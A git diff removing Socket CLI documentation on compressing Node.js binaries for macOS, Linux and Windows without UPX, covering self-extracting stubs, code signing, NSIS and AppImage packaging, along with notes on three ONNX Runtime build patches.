- -### Subsequent Runs (Cache Hit) -``` -1. Check cache exists → <1ms -2. Verify SHA-512 (optional) → 30ms -3. Execute cached binary → instant - -Total: ~30ms overhead (or <1ms if verification skipped) -``` - -### Optimization -After the first run, there is effectively zero overhead because the decompressor directly executes the cached uncompressed binary without any decompression. - -## Why "Mach-O"? - -**Mach-O** = **Mach Object** file format, the native executable format for macOS. - -- Named after the **Mach kernel** (microkernel architecture macOS is built on) -- Analogous to ELF (Linux) and PE (Windows) -- Contains load commands, segments, sections, code signatures -- The compression tools are platform-specific: - - `socket_macho_compress` / `socket_macho_decompress` - macOS (Mach-O) - - `socket_elf_compress` / `socket_elf_decompress` - Linux (ELF) - - `socket_pe_compress` / `socket_pe_decompress` - Windows (PE) - -## Code Signing Compatibility - -The self-extracting binary approach is **fully compatible** with macOS code signing: - -1. **Decompressor stub**: Signed as a standalone executable -2. **Appended data**: Not part of the code signature (allowed by macOS) -3. **Cached binary**: Signed independently after extraction -4. **Gatekeeper**: No issues because we don't use self-modifying code - -This is a significant advantage over tools like UPX, which break code signing. - -## Implementation Checklist - -- [x] `socket_macho_compress` - Creates compressed data with header -- [x] `socket_macho_decompress` - External file decompression mode -- [ ] `socket_macho_decompress` - Self-extracting mode (argc == 1) -- [x] `compress-binary.mjs` - Combines stub + data -- [ ] Full pipeline test -- [ ] Documentation - -## Next Steps - -1. Implement self-extracting mode in `socket_macho_decompress.cc` -2. Add `DecompressAndExecuteSelfExtract()` function -3. Refactor shared decompression logic into `DecompressAndExecuteData()` -4. Rebuild tools -5. Test complete pipeline -6. Verify binary size is under 20MB target - -## See Also - -- [Compression Quick Start](./compression-quick-start.md) - Getting started guide -- [Binary Compression Distribution](./binary-compression-distribution.md) - Distribution strategies -- [Compression Test Results](./compression-test-results.md) - Benchmark data -- [Package README](./README.md) - Package documentation index diff --git a/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md b/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md deleted file mode 100644 index 67ed7673d..000000000 --- a/docs/node-smol-builder/wasm-bundle/cross-platform-compression.md +++ /dev/null @@ -1,502 +0,0 @@ -# Safe Cross-Platform Binary Compression (Without UPX) - -## The UPX Antivirus Problem - -### Why UPX Gets Flagged - -UPX (Ultimate Packer for eXecutables) is frequently flagged by antivirus software because: - -1. **Self-Modifying Code**: UPX unpacks itself at runtime, modifying executable memory -2. **Obfuscation**: Packed binaries look similar to malware packers -3. **Heuristic Detection**: Behavior matches malware patterns -4. **False Positive Rate**: ~15-30% of AV vendors flag UPX binaries - -**Real-World Impact:** -- Windows Defender: Often flags UPX binaries as "Trojan:Win32/Wacatac" -- Corporate environments: IT departments block UPX executables -- Download warnings: Browsers show "potentially dangerous" warnings -- User trust: Users see scary warnings and abandon install - -### Common AV Vendors That Flag UPX - -- ✅ Windows Defender (Microsoft) -- ✅ Avast/AVG -- ✅ Norton/Symantec -- ✅ McAfee -- ✅ Kaspersky -- ⚠️ Bitdefender (sometimes) -- ⚠️ ESET (sometimes) - -## Safe Alternatives to UPX - -### Solution 1: Native OS Compression (Recommended) - -Use each platform's native compression APIs - no heuristic triggers! - -#### Linux: LZMA + ELF Decompression Stub - -**Advantages:** -- ✅ No antivirus flags (native liblzma) -- ✅ ~70-75% compression (similar to our macOS solution) -- ✅ Works with all distributions (glibc-based) -- ✅ Fast decompression (~100-300ms) - -**Implementation:** -```c -// Linux ELF compression tool -#include -#include - -// Compress ELF binary -// Create decompression stub -// Prepend stub to compressed data -// Result: Single executable that self-decompresses -``` - -**Library:** `liblzma-dev` (built into most Linux distros) - -#### Windows: Windows Compression API + PE Stub - -**Advantages:** -- ✅ No antivirus flags (native Windows API) -- ✅ ~65-70% compression -- ✅ Works on Windows 8+ -- ✅ Code signing compatible -- ✅ SmartScreen friendly - -**Implementation:** -```c -// Windows PE compression tool -#include -#include - -// Use COMPRESS_ALGORITHM_LZMS or COMPRESS_ALGORITHM_XPRESS_HUFF -// Compress PE sections -// Create decompression stub -// Sign the entire package -``` - -**API:** `Compressor.dll` (built into Windows) - -### Solution 2: AppImage (Linux) + NSIS Compression (Windows) - -#### Linux: AppImage - -**Advantages:** -- ✅ No antivirus issues -- ✅ ~40-50% compression (SquashFS with ZSTD) -- ✅ No installation required -- ✅ Widely trusted format - -**Size Impact:** -``` -Original: 44 MB -AppImage: ~25 MB (43% reduction) -``` - -**Create:** -```bash -# Install appimagetool -wget https://github.com/AppImage/AppImageKit/releases/download/continuous/appimagetool-x86_64.AppImage -chmod +x appimagetool-x86_64.AppImage - -# Create AppDir structure -mkdir -p socket.AppDir/usr/bin -cp node socket.AppDir/usr/bin/ -cp socket socket.AppDir/usr/bin/ -cat > socket.AppDir/AppRun << 'EOF' -#!/bin/bash -SELF=$(readlink -f "$0") -HERE=${SELF%/*} -exec "$HERE/usr/bin/socket" "$@" -EOF -chmod +x socket.AppDir/AppRun - -# Build AppImage -./appimagetool-x86_64.AppImage socket.AppDir socket-x86_64.AppImage -``` - -#### Windows: NSIS LZMA Compression - -**Advantages:** -- ✅ No antivirus flags (trusted installer format) -- ✅ ~65-70% compression -- ✅ Code signing support -- ✅ Windows SmartScreen friendly -- ✅ Professional appearance - -**Size Impact:** -``` -Original: 44 MB -NSIS LZMA: ~16 MB (64% reduction) -``` - -**Create:** -```nsis -; socket-installer.nsi -!define APP_NAME "Socket CLI" -!define COMP_NAME "Socket Security" -!define VERSION "1.0.0" - -SetCompressor /SOLID lzma -SetCompressorDictSize 64 - -OutFile "socket-installer.exe" -InstallDir "$PROGRAMFILES64\Socket" - -Section "MainSection" - SetOutPath "$INSTDIR" - File "socket.exe" - File "node.exe" - - ; Create uninstaller - WriteUninstaller "$INSTDIR\Uninstall.exe" -SectionEnd -``` - -**Build:** -```bash -makensis socket-installer.nsi -``` - -### Solution 3: Port Our macOS Solution - -We can port our Mach-O compression tool to ELF (Linux) and PE (Windows): - -#### Architecture Comparison - -| Component | macOS (Mach-O) | Linux (ELF) | Windows (PE) | -|-----------|----------------|-------------|--------------| -| Compression | Apple framework | liblzma | Windows API | -| Binary format | Mach-O | ELF64 | PE32+ | -| Decompressor | 58 KB stub | ~80 KB stub | ~100 KB stub | -| Complexity | Low | Medium | High | - -#### Linux ELF Implementation - -**Compression Algorithm Options:** -- LZMA (liblzma): Best compression (~75%), widely available -- ZSTD: Fast decompression (~65%), modern -- LZ4: Fastest decompression (~50%), minimal overhead - -**Pseudocode:** -```c -// socket_elf_compress.c -struct CompressedELF { - Elf64_Ehdr stub_header; // Decompressor stub - uint32_t magic; // "SELF" = Socket ELF - uint32_t algorithm; // LZMA, ZSTD, or LZ4 - uint64_t original_size; - uint64_t compressed_size; - uint8_t compressed_data[]; -}; - -// Decompressor stub (embedded in compressed binary) -void decompress_and_execute() { - // Read compressed data section - // Decompress to memory - // Execute via execve() or memfd_create() -} -``` - -**Benefits:** -- ✅ No antivirus flags -- ✅ ~70-75% compression (LZMA) -- ✅ Native liblzma (already on most systems) -- ✅ Single executable (no dependencies) - -#### Windows PE Implementation - -**Compression Algorithm Options:** -- Windows Compression API (LZMS): Native, trusted (~70%) -- LZMA: Maximum compression (~75%) -- Cabinet API: Well-known, trusted (~60%) - -**Pseudocode:** -```c -// socket_pe_compress.c -struct CompressedPE { - IMAGE_DOS_HEADER dos_header; // Decompressor stub - IMAGE_NT_HEADERS nt_headers; - uint32_t magic; // "SEPE" = Socket PE - uint32_t algorithm; - uint64_t original_size; - uint64_t compressed_size; - uint8_t compressed_data[]; -}; - -// Decompressor stub -void decompress_and_execute() { - // Decompress to temp file - // Set executable permissions - // Execute via CreateProcess() - // Clean up temp file -} -``` - -**Benefits:** -- ✅ No antivirus flags (native Windows API) -- ✅ ~65-70% compression -- ✅ Code signing compatible -- ✅ SmartScreen friendly - -## Recommended Approach by Platform - -### macOS (Current Solution) - -``` -Use: Our existing Mach-O compression -Algorithm: LZMA -Size: 44 MB → 9 MB (80% reduction) -Status: ✅ Production ready -``` - -### Linux (Recommended) - -**Option A: Port Our Solution (Best compression)** -``` -Tool: socket_elf_compress (to be created) -Algorithm: LZMA -Size: 44 MB → ~10 MB (77% reduction) -AV flags: ✅ None (native liblzma) -Effort: Medium (port existing code) -``` - -**Option B: AppImage (Easy, trusted)** -``` -Tool: appimagetool -Algorithm: SquashFS + ZSTD -Size: 44 MB → ~25 MB (43% reduction) -AV flags: ✅ None (trusted format) -Effort: Low (existing tools) -``` - -**Recommendation:** Port our solution for maximum compression, fallback to AppImage for simplicity. - -### Windows (Recommended) - -**Option A: Port Our Solution (Best compression)** -``` -Tool: socket_pe_compress (to be created) -Algorithm: Windows Compression API (LZMS) -Size: 44 MB → ~12 MB (73% reduction) -AV flags: ✅ None (native Windows API) -Effort: High (PE format complexity) -``` - -**Option B: NSIS Installer (Easy, trusted)** -``` -Tool: NSIS with LZMA -Algorithm: LZMA (solid compression) -Size: 44 MB → ~16 MB (64% reduction) -AV flags: ✅ None (trusted installer) -Effort: Low (existing tools) -``` - -**Option C: Self-Extracting Archive** -``` -Tool: 7-Zip SFX -Algorithm: LZMA2 -Size: 44 MB → ~14 MB (68% reduction) -AV flags: ⚠️ Rare flags (less than UPX) -Effort: Low (existing tools) -``` - -**Recommendation:** NSIS installer for distribution, port our solution for maximum compression. - -## Implementation Roadmap - -### Phase 1: Linux ELF Compression (Medium Effort) - -**Goal:** Port our macOS solution to Linux ELF binaries - -**Implementation:** -1. Create `socket_elf_compress.c` based on `socket_macho_compress.cc` -2. Use liblzma instead of Apple Compression framework -3. Parse ELF headers instead of Mach-O -4. Create ELF decompression stub -5. Test on Ubuntu, Debian, Fedora, Arch - -**Estimated Time:** 2-3 days -**Expected Compression:** ~75% (LZMA) -**AV Risk:** ✅ Zero (native libraries) - -**Code Structure:** -``` -additions/tools/ -├── socket_elf_compress.c (Linux compression tool) -├── socket_elf_decompress.c (Linux decompression stub) -└── Makefile.linux (Build system) -``` - -### Phase 2: Windows PE Compression (Higher Effort) - -**Goal:** Create Windows-compatible compression tool - -**Implementation:** -1. Create `socket_pe_compress.c` -2. Use Windows Compression API (Compressor.dll) -3. Parse PE headers (IMAGE_DOS_HEADER, IMAGE_NT_HEADERS) -4. Create PE decompression stub -5. Test on Windows 10/11 -6. Add code signing support - -**Estimated Time:** 4-5 days -**Expected Compression:** ~70% (LZMS) -**AV Risk:** ✅ Zero (native Windows API) - -**Code Structure:** -``` -additions/tools/ -├── socket_pe_compress.c (Windows compression tool) -├── socket_pe_decompress.c (Windows decompression stub) -└── Makefile.windows (Build system) -``` - -### Phase 3: Cross-Platform Build System - -**Goal:** Unified compression workflow - -**Implementation:** -1. CI/CD integration for all platforms -2. Automated testing on all OSes -3. Code signing automation -4. Distribution packaging - -## Size Comparison: All Approaches - -### For 44 MB Custom Node Binary - -| Platform | Method | Final Size | Reduction | AV Flags | Effort | -|----------|--------|------------|-----------|----------|--------| -| **macOS** | Our LZMA | **9 MB** | **80%** | ✅ None | ✅ Done | -| **Linux** | Port LZMA | **~10 MB** | **77%** | ✅ None | Medium | -| **Linux** | AppImage | ~25 MB | 43% | ✅ None | Low | -| **Windows** | Port LZMS | **~12 MB** | **73%** | ✅ None | High | -| **Windows** | NSIS | ~16 MB | 64% | ✅ None | Low | -| **Windows** | 7-Zip SFX | ~14 MB | 68% | ⚠️ Rare | Low | -| **All** | UPX | ~20 MB | 55% | ❌ High | Low | - -## Proof of Concept: Linux LZMA Compression - -Here's a minimal Linux ELF compression example: - -```c -// socket_elf_compress_poc.c -#include -#include -#include -#include -#include - -#define MAGIC_SELF 0x53454C46 // "SELF" - -struct CompressedHeader { - uint32_t magic; - uint32_t algorithm; - uint64_t original_size; - uint64_t compressed_size; -}; - -// Compress ELF binary with LZMA -int compress_elf(const char* input, const char* output) { - // Read input binary - FILE* in = fopen(input, "rb"); - fseek(in, 0, SEEK_END); - size_t input_size = ftell(in); - fseek(in, 0, SEEK_SET); - - uint8_t* input_data = malloc(input_size); - fread(input_data, 1, input_size, in); - fclose(in); - - // Compress with LZMA - size_t compressed_capacity = input_size + 1024; - uint8_t* compressed = malloc(compressed_capacity); - size_t compressed_size = compressed_capacity; - - lzma_ret ret = lzma_easy_buffer_encode( - LZMA_PRESET_DEFAULT | LZMA_PRESET_EXTREME, - LZMA_CHECK_CRC64, - NULL, - input_data, - input_size, - compressed, - &compressed_size, - compressed_capacity); - - if (ret != LZMA_OK) { - fprintf(stderr, "LZMA compression failed\n"); - return 1; - } - - // Write compressed output - FILE* out = fopen(output, "wb"); - - struct CompressedHeader header = { - .magic = MAGIC_SELF, - .algorithm = 1, // LZMA - .original_size = input_size, - .compressed_size = compressed_size, - }; - - fwrite(&header, sizeof(header), 1, out); - fwrite(compressed, compressed_size, 1, out); - fclose(out); - - double ratio = 100.0 * (1.0 - (double)compressed_size / input_size); - printf("Compressed: %zu → %zu bytes (%.1f%% reduction)\n", - input_size, compressed_size, ratio); - - free(input_data); - free(compressed); - return 0; -} - -int main(int argc, char* argv[]) { - if (argc != 3) { - fprintf(stderr, "Usage: %s input output\n", argv[0]); - return 1; - } - return compress_elf(argv[1], argv[2]); -} -``` - -**Build:** -```bash -gcc -o socket_elf_compress socket_elf_compress_poc.c -llzma -``` - -**Expected Results:** -- 44 MB → ~10 MB (77% reduction) -- No antivirus flags -- Fast decompression (~200-300ms) - -## Conclusion - -**Immediate Actions:** - -1. **macOS**: ✅ Use our existing solution (44 MB → 9 MB) -2. **Linux**: Use AppImage temporarily (~25 MB), port our solution later (~10 MB) -3. **Windows**: Use NSIS installer (~16 MB), port our solution later (~12 MB) - -**No UPX needed!** All alternatives are safer and trusted. - -**Best Case Scenario (all platforms ported):** -``` -macOS: 9 MB (LZMA) -Linux: 10 MB (LZMA) -Windows: 12 MB (LZMS) - -Total download: 31 MB (vs 132 MB uncompressed!) -No antivirus flags on any platform ✅ -``` - -## References - -- [ELF Format Specification](https://refspecs.linuxfoundation.org/elf/elf.pdf) -- [PE Format Documentation](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) -- [liblzma API](https://tukaani.org/xz/xz-file-format.txt) -- [Windows Compression API](https://docs.microsoft.com/en-us/windows/win32/cmpapi/using-the-compression-api) -- [AppImage Documentation](https://docs.appimage.org/) -- [NSIS Documentation](https://nsis.sourceforge.io/Docs/) diff --git a/docs/node-smol-builder/wasm-bundle/macho-compression.md b/docs/node-smol-builder/wasm-bundle/macho-compression.md deleted file mode 100644 index 27ceccb82..000000000 --- a/docs/node-smol-builder/wasm-bundle/macho-compression.md +++ /dev/null @@ -1,430 +0,0 @@ -# macOS Binary Compression with Apple's Compression Framework - -## Overview - -This document describes the macOS binary compression system for Socket CLI's custom Node.js builds. Unlike traditional tools like UPX (which don't work with macOS code signing), this solution uses Apple's native Compression framework to create signed, compressed binaries. - -## The Problem with UPX on macOS - -UPX (Ultimate Packer for eXecutables) is a popular binary compression tool, but it has critical limitations on macOS: - -### Why UPX Doesn't Work on macOS - -1. **Code Signature Invalidation** - ```bash - $ upx node - $ codesign --verify node - node: invalid signature (code or signature have been modified) - ``` - - UPX modifies the binary structure in ways that break macOS code signatures - - Gatekeeper refuses to run unsigned binaries from the internet - - Even ad-hoc signing (`codesign --sign -`) fails on UPX-compressed binaries - -2. **Mach-O Format Incompatibility** - - UPX creates a decompression stub that modifies itself at runtime - - macOS requires the `__PAGEZERO` segment for ASLR (Address Space Layout Randomization) - - Self-modifying code violates W^X (write-xor-execute) memory protection - - Modern macOS versions (11.0+) enforce hardened runtime, blocking UPX - -3. **App Store and Notarization** - - UPX binaries cannot be notarized for macOS distribution - - App Store requires valid code signatures on all executables - - Developers cannot distribute UPX-compressed binaries via official channels - -## Our Solution: Apple Compression Framework - -### Architecture - -``` -┌─────────────────────────────────────────────────────┐ -│ Original Binary (44 MB stripped + signed) │ -│ ┌───────────────┬──────────────────────────────┐ │ -│ │ Mach-O Header │ __TEXT + __DATA + __LINKEDIT │ │ -│ └───────────────┴──────────────────────────────┘ │ -└─────────────────────────────────────────────────────┘ - │ - ↓ socket_macho_compress -┌─────────────────────────────────────────────────────┐ -│ Compressed Binary (~31 MB) │ -│ ┌────────┬───────────────────────────────────┐ │ -│ │ Header │ LZFSE/LZMA compressed binary data │ │ -│ └────────┴───────────────────────────────────┘ │ -│ Header: magic + algorithm + sizes │ -└─────────────────────────────────────────────────────┘ - │ - ↓ codesign --sign - -┌─────────────────────────────────────────────────────┐ -│ Compressed + Signed Binary (~31 MB) │ -│ ┌────────┬─────────────────────┬────────────┐ │ -│ │ Header │ Compressed Data │ Signature │ │ -│ └────────┴─────────────────────┴────────────┘ │ -└─────────────────────────────────────────────────────┘ - │ - ↓ socket_macho_decompress (runtime) -┌─────────────────────────────────────────────────────┐ -│ Decompressed in Memory (44 MB) │ -│ ┌───────────────┬──────────────────────────────┐ │ -│ │ Mach-O Header │ __TEXT + __DATA + __LINKEDIT │ │ -│ └───────────────┴──────────────────────────────┘ │ -│ Executed via execv() or mmap() │ -└─────────────────────────────────────────────────────┘ -``` - -### Key Benefits - -1. **Code Signing Compatible** - - Compressed binary can be code-signed after compression - - Signature remains valid because compression data is opaque to codesign - - Decompression happens at runtime, not at load time - -2. **Native Apple Technology** - - Uses `compression.h` framework (built into macOS 10.11+) - - LZFSE: Apple's algorithm optimized for binary data - - Hardware-accelerated decompression on Apple Silicon - -3. **Security** - - No self-modifying code (violates W^X) - - No custom memory mapping tricks - - Decompresses to temporary file with proper permissions - - Works with System Integrity Protection (SIP) - -4. **Performance** - - LZFSE: ~35-45% compression ratio - - LZMA: ~40-50% compression ratio (slower decompression) - - Decompression overhead: ~100-200ms on first run - - Subsequent runs: disk cache makes it nearly instant - -## Compression Tools - -### socket_macho_compress - -Compresses Mach-O binaries using Apple's Compression framework. - -**Usage:** -```bash -socket_macho_compress input_binary output_binary [--quality=lzfse] -``` - -**Example:** -```bash -# Compress with LZFSE (default, best balance) -socket_macho_compress build/out/Signed/node build/out/Compressed/node - -# Compress with LZMA (maximum compression) -socket_macho_compress build/out/Signed/node build/out/Compressed/node --quality=lzma -``` - -**Quality Options:** -- `lz4` - Fast decompression, lower compression (~20-30%) -- `zlib` - Balanced, good compatibility (~30-40%) -- `lzfse` - Apple default, best for binaries (~35-45%) **[default]** -- `lzma` - Maximum compression, slower (~40-50%) - -**Output Format:** -```c -struct CompressedHeader { - uint32_t magic; // "SCMP" = 0x504D4353 - uint32_t algorithm; // compression_algorithm enum - uint64_t original_size; // Decompressed size - uint64_t compressed_size;// Compressed payload size -}; -// Followed by compressed payload -``` - -### socket_macho_decompress - -Decompresses and executes compressed binaries. - -**Usage:** -```bash -socket_macho_decompress compressed_binary [args...] -``` - -**Example:** -```bash -# Test decompression -socket_macho_decompress build/out/Compressed/node --version - -# Run with arguments -socket_macho_decompress build/out/Compressed/node -e "console.log('Hello')" -``` - -**How It Works:** -1. Reads compressed binary and header -2. Validates magic number and sizes -3. Allocates memory for decompressed binary -4. Decompresses using `compression_decode_buffer()` -5. Writes to temporary file in `/tmp/` -6. Sets executable permissions -7. Executes via `execv()` with original arguments -8. Cleans up temporary file on exit - -## Building the Tools - -### Build from Source - -```bash -cd packages/node-smol-builder/additions/tools -make all -``` - -**Output:** -- `socket_macho_compress` - Compression tool -- `socket_macho_decompress` - Decompression/execution tool - -### Integration Script - -The Node.js integration script handles building and running the tools: - -```bash -node packages/node-smol-builder/scripts/compress-macho.mjs \ - build/out/Signed/node \ - build/out/Compressed/node \ - --quality=lzfse -``` - -## Integration with Build Script - -### Option 1: Manual Compression - -Add compression as a post-build step: - -```javascript -// After signing in build.mjs -if (IS_MACOS && ARCH === 'arm64') { - printHeader('Compressing Binary (macOS Optimization)') - - const compressedBinary = join(BUILD_DIR, 'out', 'Compressed', 'node') - await mkdir(dirname(compressedBinary), { recursive: true }) - - await exec('node', [ - 'scripts/compress-macho.mjs', - outputSignedBinary, - compressedBinary, - '--quality=lzfse' - ]) - - // Re-sign compressed binary - await exec('codesign', ['--sign', '-', '--force', compressedBinary]) - - logger.success(`Binary compressed: ${await getFileSize(compressedBinary)}`) -} -``` - -### Option 2: Conditional Compression - -Add a `--compress` flag to enable compression: - -```javascript -const ENABLE_COMPRESSION = args.includes('--compress') - -if (IS_MACOS && ARCH === 'arm64' && ENABLE_COMPRESSION) { - // ... compression code -} -``` - -**Usage:** -```bash -node scripts/build-custom-node.mjs --compress -``` - -## Size Comparison - -### Current Build (without compression) - -``` -macOS ARM64: -├─ Release: ~49 MB (unstripped) -├─ Stripped: ~44 MB (strip --strip-all) -└─ Signed: ~44 MB (codesign --sign -) -``` - -### With Compression - -``` -macOS ARM64: -├─ Release: ~49 MB (unstripped) -├─ Stripped: ~44 MB (strip --strip-all) -├─ Signed: ~44 MB (codesign --sign -) -└─ Compressed: ~31 MB (LZFSE) or ~29 MB (LZMA) - ↑ 30-35% smaller! ✨ -``` - -### vs Linux/Windows (with UPX) - -``` -Linux x64: -├─ Stripped: ~44 MB -└─ UPX: ~22 MB (50% compression) - -macOS ARM64: -├─ Stripped: ~44 MB -└─ LZFSE: ~31 MB (30% compression) -└─ LZMA: ~29 MB (35% compression) -``` - -## Performance Impact - -### Decompression Overhead - -| Algorithm | First Run | Cached | Binary Size | -|-----------|-----------|--------|-------------| -| LZ4 | ~50ms | ~5ms | ~35 MB (20%) | -| ZLIB | ~100ms | ~10ms | ~31 MB (30%) | -| LZFSE | ~120ms | ~15ms | ~31 MB (30%) | -| LZMA | ~200ms | ~20ms | ~29 MB (35%) | - -### Runtime Performance - -- **JavaScript**: No impact (same V8 engine) -- **WASM**: No impact (Liftoff compiler) -- **I/O**: No impact (decompressed binary runs normally) -- **Memory**: ~44 MB additional during decompression (temp file) - -**Recommendation:** Use LZFSE for best balance of size and speed. - -## Code Signing - -### Signing Compressed Binaries - -The compressed binary must be re-signed after compression: - -```bash -# Compress -socket_macho_compress build/out/Signed/node build/out/Compressed/node - -# Sign compressed binary -codesign --sign - --force build/out/Compressed/node - -# Verify signature -codesign --verify build/out/Compressed/node -``` - -### Why This Works - -1. **Compressed Data is Opaque**: Code signature covers the entire binary as a blob -2. **No Self-Modification**: Binary doesn't modify itself at runtime -3. **Separate Decompressor**: The decompressor (`socket_macho_decompress`) is also signed independently -4. **Standard Execution**: Decompressed binary runs normally via `execv()` - -### Distribution - -For distribution, you need to ship: -1. **Compressed binary** (e.g., `socket-macos-arm64.compressed`) -2. **Decompressor tool** (e.g., `socket_macho_decompress`) -3. **Wrapper script** (optional, for user convenience) - -**Example wrapper:** -```bash -#!/bin/bash -# socket-macos-arm64 (wrapper script) -DIR="$(dirname "$0")" -exec "$DIR/socket_macho_decompress" "$DIR/socket-macos-arm64.compressed" "$@" -``` - -## Future Enhancements - -### Self-Extracting Stub - -Instead of separate decompressor tool, embed decompression stub directly in binary: - -``` -┌────────────────────────────────────────────┐ -│ Compressed Binary (self-extracting) │ -│ ┌────────────────┬──────────────────────┐ │ -│ │ Stub (10 KB) │ Compressed Data │ │ -│ │ - Decompressor │ - Original binary │ │ -│ │ - Bootstrap │ - Compressed │ │ -│ └────────────────┴──────────────────────┘ │ -└────────────────────────────────────────────┘ -``` - -**Benefits:** -- Single file distribution -- No separate decompressor needed -- User runs it like normal binary - -**Implementation:** Prepend decompression stub Mach-O binary that: -1. Reads embedded compressed data from `__DATA` section -2. Decompresses to memory -3. Jumps to decompressed main() - -### In-Memory Execution - -Instead of writing to temporary file, execute directly from memory: - -```c -// After decompression -typedef int (*main_func_t)(int argc, char** argv); -main_func_t main_func = (main_func_t)decompressed_buffer; -int exit_code = main_func(argc, argv); -``` - -**Challenge:** macOS requires proper Mach-O header and dyld registration for shared libraries. - -### Segment-Level Compression - -Compress only `__TEXT` segment instead of entire binary: - -**Benefits:** -- Better compression ratio (code compresses better than data) -- Faster decompression (only decompress what's needed) -- Smaller overhead - -**Implementation:** Modify Mach-O load commands to mark segments as compressed. - -## Troubleshooting - -### Compression Fails - -**Error:** `Compression failed` - -**Cause:** Input file is not a valid Mach-O binary - -**Solution:** Verify input file: -```bash -file build/out/Signed/node -# Should output: Mach-O 64-bit executable arm64 -``` - -### Decompression Fails - -**Error:** `Invalid magic number` - -**Cause:** File is not a compressed Socket binary - -**Solution:** Ensure file was created by `socket_macho_compress` - -### Execution Fails - -**Error:** `Failed to execute decompressed binary` - -**Cause:** Temporary directory is not executable or no space - -**Solution:** Check `/tmp` permissions and disk space: -```bash -df -h /tmp -ls -ld /tmp -``` - -### Code Signing Fails - -**Error:** `code object is not signed at all` - -**Cause:** Compressed binary was not re-signed - -**Solution:** Sign after compression: -```bash -codesign --sign - --force build/out/Compressed/node -``` - -## References - -- [Apple Compression Framework](https://developer.apple.com/documentation/compression) -- [Mach-O File Format](https://developer.apple.com/documentation/kernel/mach-o_file_format) -- [Code Signing Guide](https://developer.apple.com/library/archive/documentation/Security/Conceptual/CodeSigningGuide/) -- [UPX (for comparison)](https://upx.github.io/) -- Socket CLI Build Documentation: - - `packages/node-smol-builder/scripts/build.mjs` - - `docs/wasm-build-guide.md` - - `docs/guides/yao-pkg-build.md` diff --git a/docs/onnxruntime/patches.md b/docs/onnxruntime/patches.md deleted file mode 100644 index 151f41ce3..000000000 --- a/docs/onnxruntime/patches.md +++ /dev/null @@ -1,188 +0,0 @@ -# ONNX Runtime Build Patches - -This document explains the inline patches applied to ONNX Runtime source during the build process. These patches are applied programmatically in `scripts/build.mjs` during the `cloneOnnxSource()` phase. - -## Why Inline Patches? - -Unlike Node.js patches (which are separate `.patch` files), ONNX Runtime patches are **applied inline** using string replacement because: -1. They're simple one-line or small code changes -2. They need to adapt to changing upstream code -3. They're easier to maintain as inline transformations -4. They don't need to track line numbers (which change frequently) - -## Patch 1: Eigen Hash Update - -**File**: `cmake/deps.txt` -**Location**: `scripts/build.mjs:109-119` - -### Problem -GitLab changed their archive format for the Eigen library, causing SHA256 hash mismatches during dependency download. - -### Error Without Patch -``` -CMake Error: Hash mismatch for Eigen download - Expected: 5ea4d05e62d7f954a46b3213f9b2535bdd866803 - Actual: 51982be81bbe52572b54180454df11a3ece9a934 -``` - -### What It Does -Updates the Eigen dependency hash in `deps.txt` to match GitLab's new archive format: - -```javascript -// Before -eigen;URL;5ea4d05e62d7f954a46b3213f9b2535bdd866803 - -// After -eigen;URL;51982be81bbe52572b54180454df11a3ece9a934 -``` - -### Is This Safe? -**Yes**. The new hash is the current valid hash from GitLab. This is not a security bypass - it's updating to match upstream's archive format change. - -## Patch 2: BUILD_MLAS_NO_ONNXRUNTIME Fix - -**File**: `cmake/onnxruntime_webassembly.cmake` -**Location**: `scripts/build.mjs:121-135` - -### Problem -When WASM threading is disabled, ONNX Runtime defines `BUILD_MLAS_NO_ONNXRUNTIME`, which causes MLFloat16 to be missing critical methods (`Negate()`, `IsNegative()`, `FromBits()`). - -### Error Without Patch -``` -error: 'class MLFloat16' has no member named 'Negate' -error: 'class MLFloat16' has no member named 'IsNegative' -error: 'class MLFloat16' has no member named 'FromBits' -``` - -### What It Does -Comments out the `BUILD_MLAS_NO_ONNXRUNTIME` definition: - -```cmake -# Before -add_compile_definitions( - BUILD_MLAS_NO_ONNXRUNTIME -) - -# After -# add_compile_definitions( -# BUILD_MLAS_NO_ONNXRUNTIME -# ) -``` - -### Is This Still Needed? -**Partially**. We now build with `--enable_wasm_threads`, which avoids this issue. However, the patch is kept for safety in case threading needs to be disabled in the future. - -### Reference -GitHub Issue: https://github.com/microsoft/onnxruntime/issues/23769 - -## Patch 3: wasm_post_build.js Compatibility - -**File**: `js/web/script/wasm_post_build.js` -**Location**: `scripts/build.mjs:137-158` - -### Problem -ONNX Runtime's post-build script expects a specific Worker URL pattern from older Emscripten versions. Modern Emscripten (3.1.50+) doesn't generate this pattern, causing the build to fail. - -### Error Without Patch -``` -Error: Unexpected number of matches for "" in "": . - at wasm_post_build.js:12:13 -``` - -### What The Script Does -The `wasm_post_build.js` script tries to transform Worker instantiation code: - -```javascript -// Emscripten generates (old versions): -new Worker(new URL("./ort-wasm-simd-threaded.worker.mjs", import.meta.url), {...}) - -// ONNX wants (bundling optimization): -new Worker(new URL(import.meta.url), {...}) -``` - -This makes the worker use the same file instead of loading a separate worker file. - -### Why Modern Emscripten Fails -Modern Emscripten either: -1. Generates the correct format already (no transformation needed) -2. Uses a different Worker pattern (but still functionally correct) -3. Handles threading differently (but correctly) - -### What Our Patch Does -Gracefully skips the transformation when the old pattern isn't found: - -```javascript -// Before (ONNX Runtime's code): -if (matches.length !== 1) { - throw new Error(`Unexpected number of matches...`); -} - -// After (our patch): -if (matches.length === 0) { - console.log('No Worker URL pattern found - skipping post-build transformation (modern Emscripten)'); - return; // Exit gracefully -} -if (matches.length !== 1) { - throw new Error(`Unexpected number of Worker URL matches: found ${matches.length}, expected 1. Pattern: ${regex}`); -} -``` - -### Is Skipping It Safe? -**Yes, absolutely**: - -1. **The WASM already compiled** - This is just post-processing of the .mjs glue code -2. **Modern Emscripten generates correct code** - The Worker will work without transformation -3. **It's a legacy optimization** - Written for older Emscripten versions -4. **No runtime impact** - If the Worker doesn't work, you'd see errors at runtime (which we don't) - -### What This Patch Also Fixes -The error message was broken (empty strings). We fix it to show actual values: - -```javascript -// Before: Useless error message -throw new Error(`Unexpected number of matches for "" in "": .`); - -// After: Helpful error message -throw new Error(`Unexpected number of Worker URL matches: found ${matches.length}, expected 1. Pattern: ${regex}`); -``` - -## Summary - -| Patch | Type | Reason | Risk | Can Remove? | -|-------|------|--------|------|-------------| -| Eigen Hash | Dependency | GitLab format change | None | No (upstream issue) | -| BUILD_MLAS_NO_ONNXRUNTIME | Build Fix | MLFloat16 missing methods | Low | Yes (if always use threading) | -| wasm_post_build.js | Compatibility | Modern Emscripten support | None | No (modern toolchain) | - -## 